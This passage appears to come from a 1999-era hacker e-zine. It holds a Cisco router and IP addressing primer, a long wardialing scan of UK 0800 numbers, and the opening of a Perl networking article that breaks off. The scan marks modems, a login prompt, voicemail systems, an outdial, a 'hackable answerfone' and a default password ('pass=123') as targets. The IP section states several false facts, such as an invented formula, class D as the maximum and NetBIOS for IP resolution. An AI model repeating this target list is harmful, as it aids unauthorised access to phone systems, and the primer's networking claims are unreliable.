91 - [Directors Hotline update]
92 - [endless ring]
93 - [Mary kay service center]
94 - ["Please enter your four digit pin" 9999 frontier thing i think AGAIN]
95 - [busy]
96 - [some help place]
97 - [tone, number controlled by 'ideas' or something, interesting check it]
98 - [dialed invalid location]
99 - [can't understand]


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Cisco Router IP config ]::[OO--[ by wiz ]--[ wiz@blackcode.com ]:::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


o0|w1z Tech Production|0o
|Configuring and Running routers -Cisco-|
|with some introduction about IP addressing|
By: w1z
Email: w1z@blackcode.com
=========================================================

What is a router? What is meant by IP? How packets are transferred? How your
ISP Assigns an IP for you? Do you really know about these issues in details
not basically? If yes then you don't need to read this article and waste your
time since you know all About this. But my advice is to read this again to
jog your memory and for other useful Reasons say that I have more information
that you don't know, or that there are some Sections that were hard for you
to understand you can read them here in plain English.

Here, I will give the information about the above sections in details, not
too Deep but enough to make you understand how things work. I see a lot of
people who call Themselves hackers/crackers/0wn3rz/13373rz/etc. who don't
know a SHIT of how the things They use work; thus they will not use them as
efficiently as possible. Understanding How the Internet Protocol worx is very
interesting and amazing (did u know that when Assigning an IP there is a
simple formula used? No shit. I think it is x-y^x=2, or Something like that
but I don't remember.). *Daily* I hear some people saying this Shit: " hey
lamer ill packet you till you die motherfucker@#@#$#@ "
or "ph33r my packets"
Or " if you repeat that again I swear I will icmp your ass" etc. didnt you
hear these Phrases? I bet that they don't know what's the meaning of a packet
or ICMP. If u ask them what Is ICMP, directly you will get this answer
"Internet Control Message Protocol", I fucking Know this but what does
"Internet Control Message Protocol" mean, he will answer back It means
"Internet Control Message Protocol" if you don't like it fuck off.

My aim in this article is to show the way for hackers/computer geeks/People
who want to learn/admins/security fans the right way for understanding some
topics In the networking/Internet realm. Since I have some knowledge in these
issues why Shouldn't I share it .

What I will discuss in this article is the following: <Routers><IP
addressing>. I will put most of my effort in the routers section since this
article basically was To be about routers but I included some topics so you
can understand better.

For any comments/suggestions/remarks drop me a mail on w1z@blackcode.com. I
hope you will get the most of this article ... now lemie start and not waste
time!

[Routers]

Ok, you have to know some basic uses of routers, and they are listed below:
*Connects two networks (LAN-to-LAN).
*They restrict other networks/individual access to a networks (basic access
list).

Routers are very important for big networx and they are relatively expensive
;) . When you want to setup a router for a certain network you will hafta
configure it first, This is the base of the router. Configuring can be from
many external sources, For example through a console port, this means a PC is
connected to the router trough A console hole at the back of the router. And
a good thing is that you can get the Configuration data from an FTP server in
the network and compile it there. Also other Terminals (w/s) from the network
can configure the router. The router has a very Fucked up complex mother
fucking hard internal designed, no doubt it is expensive. Inside *ironically*
the router there are some architecture that is complex. We have < RAM - NVRAM
- FLAH MEMORY - ROM - CONSOLE - AUXILIARY - INTERFACES > inside a router. All
of you know what is RAM and ROM (if you don't then don't continue reading
pls.) but what ARE NVRAM, FALSH MEMORY, CONSOLE, AND AUXILIARY? Ok NVRAM
means Non-Volatile RAM. This Simply contains a backup copy of your
configurations, FLASH MEMORY is like memory card is Sony play station :p ...
it is a slot behind the router where the flash card is Inserted, it is a
special kind of erasable programmable read only memory and contains A copy of
Cisco IOS (in Cisco routers (IOS (Internetwork Operating system))). The
CONSOLE and AUXILIARY are for the configurations ... where the a PC is
connected to the console hole and An auxiliary connected in the AUXILIARY
hole. Lemmie mention the algorithm that is used For the sartup ... hmmmm. Ok,
when the router first starts it will look for the Configuration file, if
found where should it be loaded from the FTP server or the FLASH MEMORY, if
it didn't find a configuration file it will be default enter the Setup mode.
Now comes the hard part, you want to configure the router and assign an IP
for it, masks, subz, etc ... you will be prompted to enter each, after you
finish Configuring everything would be ready. Shit I forgot to mention above
that the Configuration file is very vital for the router; it is like the
brain that's why we have NVRAM in the router. The hard thing for most people
if configuration is the IP settings. There is a section for IP addressing
after the router section.

Now let discuss the commands used for configuring/running the router. When
you are First connected to the router and the configuration file is
configured and sat you will be Prompted by a line asking for a password to
get access for the router.

User Access Verification

Password:
W1ztech_router>

In this case I wont be a privileged user, so if I want to enter the privilege
mode I should Type "enable". It will then ask for another password. U enter
it and you will be A privileged user. Notice that in UNIX systems they use %
or $ for the normal user While here they use > ... and in UNIX the root # and
it is the same for Cisco router (This isn't important). If you are a newbie
you can browse the list of commands by typing "?" and for example you needed
help if the config command u type "config ?". To see the other things in the
router like the interfaces, pppz, slipz, IPz, access lists,etc.. you should
type sh and the things you want to see, sh stands for show u can also use
show. say for example you want to see the interfaces so you will
type "sh interfaces". say you want to change the hostname of the router ...
lets take this example : w1ztech_router# <---- should be # so you can
change the hostname ... type config press enter, then type terminal and press
enter ... you will see this : w1ztech_router(config)# now type hostname and
and press space then the name of the hostname...w1ztech_router(config)
#hostname w1z then when you press enter u will see this : w1z(config)# now
hold ctrl and press z to get out of config. Hopefully in the next a next
article I will continue to go in more details for the Commands and setting,
for now it is fine for you if you practice and get help by the "?" command.
you can telnet to a router and use it, u can telnet then from the router to
another host and etc .... here is a list of commands for a Cisco router:

Access-enable Create a temporary Access-List entry
Access-template Create a temporary Access-List entry
bfe For manual emergency modes setting
clear Reset functions
clock Manage the system clock
configure Enter configuration mode
connect Open a terminal connection
copy Copy configuration or image data
debug Debugging functions (see also 'undebug')
disable Turn off privileged commands
disconnect Disconnect an existing network connection
enable Turn on privileged commands
erase Erase flash or configuration memory
exit Exit from the EXEC
help Description of the interactive help system
lock Lock the terminal
login Log in as a particular user
logout Exit from the EXEC
name-connection Name an existing network connection
no Disable debugging functions
pad Open a X.29 PAD connection
ping Send echo messages
ppp Start IETF Point-to-Point Protocol (PPP)
reload Halt and perform a cold restart
resume Resume an active network connection
rlogin Open an rlogin connection
rsh Execute a remote command
send Send a message to other tty lines
setup Run the SETUP command facility
show Show running system information
slip Start Serial-line IP (SLIP)
start-chat Start a chat-script on a line
systat Display information about terminal lines
telnet Open a telnet connection
terminal Set terminal line parameters
test Test subsystems, memory, and interfaces
traceroute Trace route to destination
tunnel Open a tunnel connection
undebug Disable debugging functions (see also 'debug')
verify Verify checksum of a Flash file
where List active connections
write Write running configuration to memory, network, or terminal
x3 Set X.3 parameters on PAD


=============================================================================

[Introduction IP Addressing]

What is an IP ? Internet protocol. Network layer protocol in the TCP/IP
stack. IP in general provides features for addressing. An IP address is a
32-digit assigned to hosts using TCP/IP. An IP could be from class A,B,C,D,E.
Written in this format zzz.zzz.zzz.zzz . Each address has a network number, a
subnet number, and a host number. The network and subnetwork number are used
for routing. A subnet mask is used to get out more network and subnetwork
information from the IP address.

Class A 1 -> 126
Class B 128 -> 191
Class C 193 -> 223
Class D
Class E

Class A -> xxx.yyy.yy.y
Class B -> xxx.xxx.yy.y
Class C -> xxx.xxx.xx.y
Class D -> xxx.xxx.xx.x
Class E

notice in class B it started from 128 and not 127, why? because 127.0.0.1 is
used for loopback test.

check this algorithm : xxxx xxxx
x<-128 x<-64 x<-32 <-16 x<-8 x<-4 x<-2 x<-1

how did I get this ? get your calculator and pay attention. ok first we have
1, 1*2=2, 2*2=4, 4*2=8, 8*2=16, 16*2=32, 32*2=64, 64*2=128.

We use this for assigning IPz.

Did u ever see a kind of this IP:298.xxx.xxx.xxx ?? NO .. WHY ?
take the maximun class which is D and add the first four xxxxs ... 128+64+32+
16 = 255 . 255.xxx.xxx.xxx is the maximum that you will ever see .

DHCP :
Dynamic host configuration protocol server . instead of assingning IPs
manually this will generate the IPs.

for resolving IP addresses we use netBIOS.

I think this is what you need to know for an introduction about IP
addressing.

--- w1z


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ O8OO scan ]:::::::::::::::[OO--[ by trionix ]--[ ]::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


0800 393 *** 500-999 by Trionix

]|[-0800-393-500-]|[ dead
]|[-0800-393-501-]|[ gas and coal services
]|[-0800-393-502-]|[ dead
]|[-0800-393-503-]|[ voice
]|[-0800-393-504-]|[ not recognised
]|[-0800-393-505-]|[ dead
]|[-0800-393-506-]|[ answerfone (medical)
]|[-0800-393-507-]|[ dead
]|[-0800-393-508-]|[ not answered
]|[-0800-393-509-]|[ dead
]|[-0800-393-510-]|[ dead
]|[-0800-393-511-]|[ press #, please enter security code
]|[-0800-393-512-]|[ not recognised
]|[-0800-393-513-]|[ dead
]|[-0800-393-514-]|[ voice
]|[-0800-393-515-]|[ norditrophan link line, press 1, *, please enter your password (4 digits)
]|[-0800-393-516-]|[ BT muffled answering service
]|[-0800-393-517-]|[ dead
]|[-0800-393-518-]|[ not answered
]|[-0800-393-519-]|[ not answered, maybe linked to 518
]|[-0800-393-520-]|[ tax keen info line, oh joy oh rapture
]|[-0800-393-521-]|[ electrician answerfone
]|[-0800-393-522-]|[ financial services, # transfers to op
]|[-0800-393-523-]|[ press #, please enter security code
]|[-0800-393-524-]|[ dead
]|[-0800-393-525-]|[ dead
]|[-0800-393-526-]|[ loud ring, msging service, press *, please enter your password (4 digits)
]|[-0800-393-527-]|[ dead
]|[-0800-393-528-]|[ not answered
]|[-0800-393-529-]|[ dead
]|[-0800-393-530-]|[ dead
]|[-0800-393-531-]|[ dead
]|[-0800-393-532-]|[ not recognised
]|[-0800-393-533-]|[ dead
]|[-0800-393-534-]|[ not answered
]|[-0800-393-535-]|[ dead
]|[-0800-393-536-]|[ voice
]|[-0800-393-537-]|[ dead
]|[-0800-393-538-]|[ dead
]|[-0800-393-539-]|[ dead
]|[-0800-393-540-]|[ dead
]|[-0800-393-541-]|[ !!!modem/fax!!! (probably fax)
]|[-0800-393-542-]|[ Legal and General redirecting me
]|[-0800-393-543-]|[ not recognised
]|[-0800-393-544-]|[ answerfone
]|[-0800-393-545-]|[ FUCKING LOUD "HELLO"
]|[-0800-393-546-]|[ answerfone
]|[-0800-393-547-]|[ dead
]|[-0800-393-548-]|[ pause, then dead
]|[-0800-393-549-]|[ pause, then dead
]|[-0800-393-550-]|[ dead
]|[-0800-393-551-]|[ dead
]|[-0800-393-552-]|[ dead
]|[-0800-393-553-]|[ diesel line tel. answering system
]|[-0800-393-554-]|[ dead
]|[-0800-393-555-]|[ dead
]|[-0800-393-556-]|[ not available
]|[-0800-393-557-]|[ dead
]|[-0800-393-558-]|[ no-one available to take call
]|[-0800-393-559-]|[ energy management centre answerfone
]|[-0800-393-560-]|[ voice, British Airways
]|[-0800-393-561-]|[ VMS, social services complaints unit
]|[-0800-393-562-]|[ dead
]|[-0800-393-563-]|[ dead
]|[-0800-393-564-]|[ not answered
]|[-0800-393-565-]|[ not answered
]|[-0800-393-566-]|[ not answered
]|[-0800-393-567-]|[ engaged
]|[-0800-393-568-]|[ not answered
]|[-0800-393-569-]|[ summat flora
]|[-0800-393-570-]|[ dead
]|[-0800-393-571-]|[ dead
]|[-0800-393-572-]|[ not answered
]|[-0800-393-573-]|[ dead
]|[-0800-393-574-]|[ dead
]|[-0800-393-575-]|[ dead
]|[-0800-393-576-]|[ voice, council homewise
]|[-0800-393-577-]|[ not answered
]|[-0800-393-578-]|[ !!!modem/fax!!! (probably fax)
]|[-0800-393-579-]|[ ding ding, voice
]|[-0800-393-580-]|[ somewhere essex, voice, v. quiet
]|[-0800-393-581-]|[ computer ring, they know I'm waiting
]|[-0800-393-582-]|[ cars, voice
]|[-0800-393-583-]|[ dead
]|[-0800-393-584-]|[ not answered
]|[-0800-393-585-]|[ publishing, order some catalog for £9
]|[-0800-393-586-]|[ dead
]|[-0800-393-587-]|[ skydeals, voice, Claire =]
]|[-0800-393-588-]|[ not recognised
]|[-0800-393-589-]|[ engaged
]|[-0800-393-590-]|[ not answered
]|[-0800-393-591-]|[ dead
]|[-0800-393-592-]|[ get rich quick scheme
]|[-0800-393-593-]|[ not recognised
]|[-0800-393-594-]|[ number has changed to 0800 300 822, which is royal sun alliance special scheme line
]|[-0800-393-595-]|[ not answered
]|[-0800-393-596-]|[ not answered
]|[-0800-393-597-]|[ covercare, answerfone
]|[-0800-393-598-]|[ AIG life, press #
]|[-0800-393-599-]|[ !!!modem/fax!!! (probably fax)
]|[-0800-393-600-]|[ not answered
]|[-0800-393-601-]|[ VMS
]|[-0800-393-602-]|[ voice
]|[-0800-393-603-]|[ !!!carrier!!!
]|[-0800-393-604-]|[ posh, PPC
]|[-0800-393-605-]|[ !!!modem/fax!!! (fax)
]|[-0800-393-606-]|[ not answered
]|[-0800-393-607-]|[ not answered
]|[-0800-393-608-]|[ not recognised
]|[-0800-393-609-]|[ not recognised
]|[-0800-393-610-]|[ not answered
]|[-0800-393-611-]|[ not answered
]|[-0800-393-612-]|[ not answered
]|[-0800-393-613-]|[ dead
]|[-0800-393-614-]|[ taxi service
]|[-0800-393-615-]|[ not answered
]|[-0800-393-616-]|[ voice
]|[-0800-393-617-]|[ !!!modem/fax!!! (fax)
]|[-0800-393-618-]|[ dead
]|[-0800-393-619-]|[ not recognised
]|[-0800-393-620-]|[ not answered
]|[-0800-393-621-]|[ dead
]|[-0800-393-622-]|[ voice, 'hello?'
]|[-0800-393-623-]|[ dead
]|[-0800-393-624-]|[ not answered
]|[-0800-393-625-]|[ dead
]|[-0800-393-626-]|[ not answered
]|[-0800-393-627-]|[ not answered
]|[-0800-393-628-]|[ not answered, d'you know, sometimes I could cry.
]|[-0800-393-629-]|[ HW, voice (finally)
]|[-0800-393-630-]|[ dead
]|[-0800-393-631-]|[ voice
]|[-0800-393-632-]|[ not answered
]|[-0800-393-633-]|[ dead
]|[-0800-393-634-]|[ voice, healthline
]|[-0800-393-635-]|[ !!!modem/fax!!! (fax)
]|[-0800-393-636-]|[ dead
]|[-0800-393-637-]|[ voice, tread windows and doors
]|[-0800-393-638-]|[ not accepting anon calls...hmmm...
]|[-0800-393-639-]|[ dead
]|[-0800-393-640-]|[ not answered
]|[-0800-393-641-]|[ voice
]|[-0800-393-642-]|[ dead
]|[-0800-393-643-]|[ answerfone
]|[-0800-393-644-]|[ not answered
]|[-0800-393-645-]|[ not answered
]|[-0800-393-646-]|[ scratchy answerfone
]|[-0800-393-647-]|[ dead
]|[-0800-393-648-]|[ not answered
]|[-0800-393-649-]|[ engaged
]|[-0800-393-650-]|[ dead
]|[-0800-393-651-]|[ dead
]|[-0800-393-652-]|[ dead
]|[-0800-393-653-]|[ answerfone
]|[-0800-393-654-]|[ BT interactive help desk, oooooohhhh!
]|[-0800-393-655-]|[ voice, cornish conservatories
]|[-0800-393-656-]|[ the original Mr. Bean company, voice
]|[-0800-393-657-]|[ dead
]|[-0800-393-658-]|[ dead
]|[-0800-393-659-]|[ not answered
]|[-0800-393-660-]|[ not answered
]|[-0800-393-661-]|[ not available
]|[-0800-393-662-]|[ voice, asking for my name
]|[-0800-393-663-]|[ changed to 0141 305 5000
]|[-0800-393-664-]|[ voice, RTA
]|[-0800-393-665-]|[ voice
]|[-0800-393-666-]|[ dead, hoping it was hell helpline or something =[
]|[-0800-393-667-]|[ voice, transmissions
]|[-0800-393-668-]|[ dead
]|[-0800-393-669-]|[ loft conversions answerfones
]|[-0800-393-670-]|[ dead
]|[-0800-393-671-]|[ not recognised
]|[-0800-393-672-]|[ not answered
]|[-0800-393-673-]|[ answerfone
]|[-0800-393-674-]|[ not answered
]|[-0800-393-675-]|[ dead
]|[-0800-393-676-]|[ dead
]|[-0800-393-677-]|[ voice, canada live
]|[-0800-393-678-]|[ dead
]|[-0800-393-679-]|[ dead
]|[-0800-393-680-]|[ dead
]|[-0800-393-681-]|[ voice, skip hire
]|[-0800-393-682-]|[ dead
]|[-0800-393-683-]|[ dead
]|[-0800-393-684-]|[ dead
]|[-0800-393-685-]|[ dead
]|[-0800-393-686-]|[ muffled answerfone, play with * and #
]|[-0800-393-687-]|[ dead
]|[-0800-393-688-]|[ not available
]|[-0800-393-689-]|[ voice
]|[-0800-393-690-]|[ dead
]|[-0800-393-691-]|[ dead
]|[-0800-393-692-]|[ not answered
]|[-0800-393-693-]|[ not answered
]|[-0800-393-694-]|[ dead
]|[-0800-393-695-]|[ dead
]|[-0800-393-696-]|[ not answered
]|[-0800-393-697-]|[ dead
]|[-0800-393-698-]|[ voice
]|[-0800-393-699-]|[ dead
]|[-0800-393-700-]|[ dead
]|[-0800-393-701-]|[ the service cannot be connected
]|[-0800-393-702-]|[ BT answering service
]|[-0800-393-703-]|[ dead
]|[-0800-393-704-]|[ answerfone, * cuts you off
]|[-0800-393-705-]|[ service no longer available, but press #, it pauses, then cuts dead...
]|[-0800-393-706-]|[ not recognised
]|[-0800-393-707-]|[ not answered
]|[-0800-393-708-]|[ voice
]|[-0800-393-709-]|[ not answered
]|[-0800-393-710-]|[ Truelink answerfone
]|[-0800-393-711-]|[ some district council answering service, press # and it says 'bye' =]
]|[-0800-393-712-]|[ dead
]|[-0800-393-713-]|[ not answered
]|[-0800-393-714-]|[ Construction liason department for the North West
]|[-0800-393-715-]|[ call can't be taken, press #, ** and enter your security code
]|[-0800-393-716-]|[ voice
]|[-0800-393-717-]|[ voice
]|[-0800-393-718-]|[ not been recognised
]|[-0800-393-719-]|[ voice
]|[-0800-393-720-]|[ voice
]|[-0800-393-721-]|[ not answered
]|[-0800-393-722-]|[ engaged
]|[-0800-393-723-]|[ !!!modem!!!(fax)
]|[-0800-393-724-]|[ not answered
]|[-0800-393-725-]|[ dead
]|[-0800-393-726-]|[ not answered
]|[-0800-393-727-]|[ not answered
]|[-0800-393-728-]|[ not recognised
]|[-0800-393-729-]|[ dead
]|[-0800-393-730-]|[ dead
]|[-0800-393-731-]|[ dead
]|[-0800-393-732-]|[ not answered(to be honest, if it doesn't pick up in 5 rings, it's probably human)
]|[-0800-393-733-]|[ dead
]|[-0800-393-734-]|[ dead
]|[-0800-393-735-]|[ Central Regional Council
]|[-0800-393-736-]|[ voice
]|[-0800-393-737-]|[ voice, chirpy person =[
]|[-0800-393-738-]|[ wierd modem
]|[-0800-393-739-]|[ dead
]|[-0800-393-740-]|[ dead
]|[-0800-393-741-]|[ !!!modem!!!(fax)
]|[-0800-393-742-]|[ not answered
]|[-0800-393-743-]|[ answerfone, press * and enter security code
]|[-0800-393-744-]|[ not answered
]|[-0800-393-745-]|[ voice
]|[-0800-393-746-]|[ not answered
]|[-0800-393-747-]|[ hidden behind answerfone --> oooh, press * and get mailbox 243, loads more boxes about
]|[-0800-393-748-]|[ dead pass=123
]|[-0800-393-749-]|[ dead
]|[-0800-393-750-]|[ engaged
]|[-0800-393-751-]|[ dead
]|[-0800-393-752-]|[ not answered
]|[-0800-393-753-]|[ voice
]|[-0800-393-754-]|[ dead
]|[-0800-393-755-]|[ voice
]|[-0800-393-756-]|[ not recognised
]|[-0800-393-757-]|[ BT mailbox, loads of others for use
]|[-0800-393-758-]|[ same
]|[-0800-393-759-]|[ !!!modem!!!(fax)
]|[-0800-393-760-]|[ answerfone, security code, etc
]|[-0800-393-761-]|[ not answered
]|[-0800-393-762-]|[ dead
]|[-0800-393-763-]|[ dead
]|[-0800-393-764-]|[ voice
]|[-0800-393-765-]|[ not answered
]|[-0800-393-766-]|[ not answered
]|[-0800-393-767-]|[ dead
]|[-0800-393-768-]|[ poor quality, voice
]|[-0800-393-769-]|[ not recognised
]|[-0800-393-770-]|[ dead
]|[-0800-393-771-]|[ engaged
]|[-0800-393-772-]|[ dead
]|[-0800-393-773-]|[ dead
]|[-0800-393-774-]|[ hm, press * get mailbox stuff (3 digits), maybe outdial
]|[-0800-393-775-]|[ press *, enter security code
]|[-0800-393-776-]|[ not answered
]|[-0800-393-777-]|[ Standard Life Investments VMS/PBX
]|[-0800-393-778-]|[ dead
]|[-0800-393-779-]|[ not answered
]|[-0800-393-780-]|[ shit, arse gone dead. Some communications line
]|[-0800-393-781-]|[ !!!modem!!!(fax)
]|[-0800-393-782-]|[ dead
]|[-0800-393-783-]|[ not answered
]|[-0800-393-784-]|[ voice, 'hullo?'
]|[-0800-393-785-]|[ National Windscreens helpline
]|[-0800-393-786-]|[ voice
]|[-0800-393-787-]|[ voice
]|[-0800-393-788-]|[ dead
]|[-0800-393-789-]|[ dead
]|[-0800-393-790-]|[ !!!modem!!!(fax)
]|[-0800-393-791-]|[ dead
]|[-0800-393-792-]|[ voice
]|[-0800-393-793-]|[ pause, then dead
]|[-0800-393-794-]|[ voice
]|[-0800-393-795-]|[ not answered
]|[-0800-393-796-]|[ dead
]|[-0800-393-797-]|[ answerfone
]|[-0800-393-798-]|[ same answerfone
]|[-0800-393-799-]|[ not answered
]|[-0800-393-800-]|[ dead
]|[-0800-393-801-]|[ extension 1160, VMB
]|[-0800-393-802-]|[ not answered
]|[-0800-393-803-]|[ not answered
]|[-0800-393-804-]|[ voice
]|[-0800-393-805-]|[ dead
]|[-0800-393-806-]|[ dead
]|[-0800-393-807-]|[ dead
]|[-0800-393-808-]|[ dead
]|[-0800-393-809-]|[ dead
]|[-0800-393-810-]|[ voice, Great Western Railways
]|[-0800-393-811-]|[ Welsh tax advising answerfone
]|[-0800-393-812-]|[ crash course in Judaism... answerfone with fax option
]|[-0800-393-813-]|[ voice
]|[-0800-393-814-]|[ dead
]|[-0800-393-815-]|[ dead
]|[-0800-393-816-]|[ dead
]|[-0800-393-817-]|[ AC television answerfone
]|[-0800-393-818-]|[ dead
]|[-0800-393-819-]|[ not answered
]|[-0800-393-820-]|[ dead
]|[-0800-393-821-]|[ !!!modem!!!(fax)
]|[-0800-393-822-]|[ dead
]|[-0800-393-823-]|[ dead
]|[-0800-393-824-]|[ dead
]|[-0800-393-825-]|[ forwarded to VMB 35482
]|[-0800-393-826-]|[ dead
]|[-0800-393-827-]|[ voice
]|[-0800-393-828-]|[ voice
]|[-0800-393-829-]|[ dead
]|[-0800-393-830-]|[ not answered
]|[-0800-393-831-]|[ office answerfone
]|[-0800-393-832-]|[ voice
]|[-0800-393-833-]|[ not answered
]|[-0800-393-834-]|[ !!!modem!!! Enter Username>Enter Passcode> Xyplex -020- Logged out port 6 on server TSLODC2 at 08 Jul 1999 07:24:54 odd, it's the 7th today, and it's 08:24:54
]|[-0800-393-835-]|[ dead
]|[-0800-393-836-]|[ not available
]|[-0800-393-837-]|[ answerfone
]|[-0800-393-838-]|[ dead
]|[-0800-393-839-]|[ some automated thing
]|[-0800-393-840-]|[ linked to a mobile... (maybe switched off)
]|[-0800-393-841-]|[ voice, too happy
]|[-0800-393-842-]|[ dead
]|[-0800-393-843-]|[ voice
]|[-0800-393-844-]|[ not recognised
]|[-0800-393-845-]|[ dead
]|[-0800-393-846-]|[ not answered
]|[-0800-393-847-]|[ not available
]|[-0800-393-848-]|[ not answered
]|[-0800-393-849-]|[ dead
]|[-0800-393-850-]|[ engaged
]|[-0800-393-851-]|[ not answered
]|[-0800-393-852-]|[ dead
]|[-0800-393-853-]|[ not answered
]|[-0800-393-854-]|[ not recognised
]|[-0800-393-855-]|[ voice
]|[-0800-393-856-]|[ dead
]|[-0800-393-857-]|[ Diane Crabb hackable answerfone
]|[-0800-393-858-]|[ press *, then 81 to login
]|[-0800-393-859-]|[ not answered
]|[-0800-393-860-]|[ dead
]|[-0800-393-861-]|[ dead
]|[-0800-393-862-]|[ dead
]|[-0800-393-863-]|[ not answered
]|[-0800-393-864-]|[ not answered
]|[-0800-393-865-]|[ !!!modem!!!
]|[-0800-393-866-]|[ answerfone
]|[-0800-393-867-]|[ not recognised
]|[-0800-393-868-]|[ changed to 01892 546 132
]|[-0800-393-869-]|[ voice
]|[-0800-393-870-]|[ not recognised
]|[-0800-393-871-]|[ voice
]|[-0800-393-872-]|[ dead
]|[-0800-393-873-]|[ voice, 226
]|[-0800-393-874-]|[ voice, crown
]|[-0800-393-875-]|[ dead
]|[-0800-393-876-]|[ voice, foreign
]|[-0800-393-877-]|[ voice, 'where the hell's good morning?'
]|[-0800-393-878-]|[ avon locks, voice
]|[-0800-393-879-]|[ dead
]|[-0800-393-880-]|[ dead
]|[-0800-393-881-]|[ dead
]|[-0800-393-882-]|[ voice
]|[-0800-393-883-]|[ voice
]|[-0800-393-884-]|[ voice
]|[-0800-393-885-]|[ dead
]|[-0800-393-886-]|[ not answered
]|[-0800-393-887-]|[ dead
]|[-0800-393-888-]|[ voice
]|[-0800-393-889-]|[ answerfone
]|[-0800-393-890-]|[ nene housing society answerfone
]|[-0800-393-891-]|[ answerfone
]|[-0800-393-892-]|[ 'The number you have dialed is not in service'<--not official voice...
]|[-0800-393-893-]|[ same
]|[-0800-393-894-]|[ not answered
]|[-0800-393-895-]|[ voice
]|[-0800-393-896-]|[ not available
]|[-0800-393-897-]|[ voice
]|[-0800-393-898-]|[ voice
]|[-0800-393-899-]|[ voice
]|[-0800-393-900-]|[ voice, party movers
]|[-0800-393-901-]|[ dead
]|[-0800-393-902-]|[ not recognised
]|[-0800-393-903-]|[ voice
]|[-0800-393-904-]|[ voice
]|[-0800-393-905-]|[ voice
]|[-0800-393-906-]|[ !!!modem!!!(fax)
]|[-0800-393-907-]|[ voice
]|[-0800-393-908-]|[ voice
]|[-0800-393-909-]|[ voice
]|[-0800-393-910-]|[ not available
]|[-0800-393-911-]|[ dead
]|[-0800-393-912-]|[ voice
]|[-0800-393-913-]|[ not recognised
]|[-0800-393-914-]|[ dead
]|[-0800-393-915-]|[ dead
]|[-0800-393-916-]|[ dead
]|[-0800-393-917-]|[ dead
]|[-0800-393-918-]|[ voice
]|[-0800-393-919-]|[ voice
]|[-0800-393-920-]|[ voice
]|[-0800-393-921-]|[ dead
]|[-0800-393-922-]|[ voice
]|[-0800-393-923-]|[ dead
]|[-0800-393-924-]|[ !!!modem!!!(fax)
]|[-0800-393-925-]|[ voice
]|[-0800-393-926-]|[ PBX
]|[-0800-393-927-]|[ dead
]|[-0800-393-928-]|[ dead
]|[-0800-393-929-]|[ dead
]|[-0800-393-930-]|[ voice
]|[-0800-393-931-]|[ dead
]|[-0800-393-932-]|[ dead
]|[-0800-393-933-]|[ voice
]|[-0800-393-934-]|[ dead
]|[-0800-393-935-]|[ not answered
]|[-0800-393-936-]|[ dead
]|[-0800-393-937-]|[ voice
]|[-0800-393-938-]|[ voice
]|[-0800-393-939-]|[ Cable & wireless Telephone account management =P
]|[-0800-393-940-]|[ voice
]|[-0800-393-941-]|[ voice
]|[-0800-393-942-]|[ dead
]|[-0800-393-943-]|[ voice
]|[-0800-393-944-]|[ voice
]|[-0800-393-945-]|[ dead
]|[-0800-393-946-]|[ voice
]|[-0800-393-947-]|[ voice
]|[-0800-393-948-]|[ voice
]|[-0800-393-949-]|[ voice
]|[-0800-393-950-]|[ not recognised
]|[-0800-393-951-]|[ dead
]|[-0800-393-952-]|[ !!!modem!!!
]|[-0800-393-953-]|[ voice
]|[-0800-393-954-]|[ dead
]|[-0800-393-955-]|[ changed to 01303 212 050
]|[-0800-393-956-]|[ not recognised
]|[-0800-393-957-]|[ not answered
]|[-0800-393-958-]|[ voice
]|[-0800-393-959-]|[ dead
]|[-0800-393-960-]|[ dead
]|[-0800-393-961-]|[ voice
]|[-0800-393-962-]|[ dead
]|[-0800-393-963-]|[ dead
]|[-0800-393-964-]|[ voice
]|[-0800-393-965-]|[ dead
]|[-0800-393-966-]|[ not answered
]|[-0800-393-967-]|[ voice
]|[-0800-393-968-]|[ not recognised
]|[-0800-393-969-]|[ voice
]|[-0800-393-970-]|[ voice
]|[-0800-393-971-]|[ not answered
]|[-0800-393-972-]|[ not answered
]|[-0800-393-973-]|[ voice
]|[-0800-393-974-]|[ the service cannot be connected
]|[-0800-393-975-]|[ !!!modem!!!(fax)
]|[-0800-393-976-]|[ !!!modem!!!(fax)
]|[-0800-393-977-]|[ voice
]|[-0800-393-978-]|[ dead
]|[-0800-393-979-]|[ voice
]|[-0800-393-980-]|[ voice
]|[-0800-393-981-]|[ dead
]|[-0800-393-982-]|[ engaged
]|[-0800-393-983-]|[ !!!modem!!!
]|[-0800-393-984-]|[ not answered
]|[-0800-393-985-]|[ dead
]|[-0800-393-986-]|[ dead
]|[-0800-393-987-]|[ voice
]|[-0800-393-988-]|[ dead
]|[-0800-393-989-]|[ voice
]|[-0800-393-990-]|[ dead
]|[-0800-393-991-]|[ dead
]|[-0800-393-992-]|[ dead
]|[-0800-393-993-]|[ voice
]|[-0800-393-994-]|[ voice
]|[-0800-393-995-]|[ dead
]|[-0800-393-996-]|[ not answered
]|[-0800-393-997-]|[ voice, deep
]|[-0800-393-998-]|[ voice
]|[-0800-393-999-]|[ dead



-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Network Programming ]::[OO--[ by z0mba ]--[ zomba@epidemik.org ]:::
-->[OO]:::::::::::::::::::::::::::::::[ New site up s00n ]:::


Woah, f41th 8 is looking pretty leet so far, so I thought i'd add to it with
another k-rad uber el8 article, as promised. Now I know I said that I was
gonna write an article on setting up an FTP server, but I thought this was
both more interesting and more f41th stylee, but I may write the FTP article
for a later issue of f41th, who knows. All I ask of you in return for me
giving you no-day network programming tekniq is your un-told gratitude and of
course all of your c0dez, just email them to the above address, heh.


Introduction
------------

One of the things that a lot of people ask when confronted with lots of
computers linked together is "How do computers actually communicate over a
network?"
. This article should explain this to you and also give you some
physical examples.

Networking and Linux are a perfect combination because linux is an OS that
was born from the internet, mainly because its makers had to (and still do)
communicate over the internet using e-mail, usenet and the WWW. Also, Linux
is based on UNIX which is where most of the fundamentals of networking
originate from anyway. Linux is an excellent platform for network
programming because it has mature and full functional networking features.
Also, because Linux provides full support for the sockets interface, most
programs developed on other version of *nix will build and run on Linux with
little or no alterations. Documentation about UNIX networking is fully
applicable to Linux as well.

In this article I have used Perl to introduce network programming which is
quite convenient considering my last article was about Perl, so if you
don't know the basic concepts of Perl, go read that first. The reason for
using perl is that you can focus on network programming concepts rather
than application development issues and programming environments. Only basic
